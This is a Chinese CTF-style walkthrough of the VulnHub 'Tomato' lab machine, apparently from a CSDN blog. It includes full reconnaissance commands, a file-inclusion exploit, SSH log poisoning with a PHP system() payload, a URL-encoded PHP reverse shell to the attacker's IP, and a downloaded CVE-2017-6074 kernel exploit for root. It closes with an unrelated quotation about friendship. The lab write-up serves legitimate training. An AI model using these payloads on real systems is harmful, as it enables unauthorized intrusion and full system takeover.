Vulnhub篇Tomato
作者:互联网
学习笔记下载
https://download.csdn.net/download/qq_41901122/14122059
环境搭建
下载地址:
https://www.vulnhub.com/entry/tomato-1,557/
kali 192.168.232.140
tomato: 192.168.232.175
win10 :192.168.232.171
第一部分 信息收集
第一步 扫描,发现主机
nmap -sP 192.168.232.0/24
arp-scan -l
第二步 扫描开放的端口
nmap -A -p- 192.168.232.175
nmap -sS -sV -p- -v 192.168.232.175
第三步 访问网站,查看网站信息,查看网站的源代码
http://192.168.232.175/
第二部分 漏洞查找
第一步 扫描目录
dirb http://192.168.232.175
python3 dirmap.py -i http://192.168.232.175 -lcf
---- Scanning URL: http://192.168.232.175/ ----
==> DIRECTORY: http://192.168.232.175/antibot_image/
+ http://192.168.232.175/index.html (CODE:200|SIZE:652)
+ http://192.168.232.175/server-status (CODE:403|SIZE:280)
第二步 访问目录,发现目录遍历漏洞
http://192.168.232.175/antibot_image/
第三步 查找可利用的文件
http://192.168.232.175/antibot_image/antibots/info.php
主要是查看注释
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Document</title>
</head>
<body>
<!-- </?php include $_GET['image']; -->
</body>
</html>
第四步 利用文件包含漏洞
http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../etc/passwd
第五步 利用文件包含漏洞,查看日志文件
http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log
第三部分 漏洞利用
第一步 已知info.php文件存在文件包含漏洞,以及开放ssh端口,
尝试包含ssh认证日志文件/var/log/auth.log,并利用ssh认证用户名实现命令注入:(使用之前发现的2211端口是ssh,日志里面发现tomato用户,查看日志信息)
第二步 利用<?php system($_GET['cmd']);?>作为用户名进行php代码注入:
ssh '<?php system($_GET['cmd']);?>'@192.168.232.175 -p 2211
ssh '<?php system($_GET['cmd']);?>'@192.168.232.187 -p 2211
第三步 验证PHP代码是否注入成功
http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=ls
第二步 利用php,开启nc监听
nc -lvvp 666
第三步 反弹shell
php反弹shell代码:
hp -r '$sock=fsockopen("192.168.232.140",666);exec("/bin/sh -i <&3 >&3 2>&3");'
进行url编码后:
php+-r+%27%24sock%3dfsockopen(%22192.168.232.140%22%2c666)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
触发反弹shell
http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=php+-r+%27%24sock%3dfsockopen(%22192.168.232.140%22%2c666)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
第四步 开启交互式shell
python3 -c "import pty;pty.spawn('/bin/bash')"
第四部分 提权
第一步 查看系统信息
uname -a
whoami
第二步 下载提权脚本,执行,编译
使用CVE-2017-6074的poc
git clone https://github.com/kkamagui/linux-kernel-exploits.git
cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074
./compile.sh
第三步 把exp上传到网站根目录,授予权限,并执行
cd /tmp
wget http://192.168.232.129/CVE-2017-6074
chmod +x CVE-2017-6074
./CVE-2017-6074
第四步 查找flag
cd /root
ls
cat proof.txt
摘抄
去靠近给你正能量的朋友圈。
谁也都知道,朋友对于性格形成的影响非常重大。
一个人的好坏,朋友熏染的力量要居大半。
每个人身旁有一个“圈子”,这圈子就是他所曾亲近的人围成的,
他跳来跳去,却跳不出这圈子。
在某一种圈子就成为某一种人。
古人说:“与善人交,如入芝兰之室,久而不闻其香;
与恶人交,如入鲍鱼之市,久而不闻其臭。”
一个人应该谨慎择友,择他所在的圈子,道理就在此。
出自《谈交友》作者丨朱光潜
标签:Tomato,http,..,image,192.168,Vulnhub,232.175,php 来源: https://blog.csdn.net/qq_41901122/article/details/112485066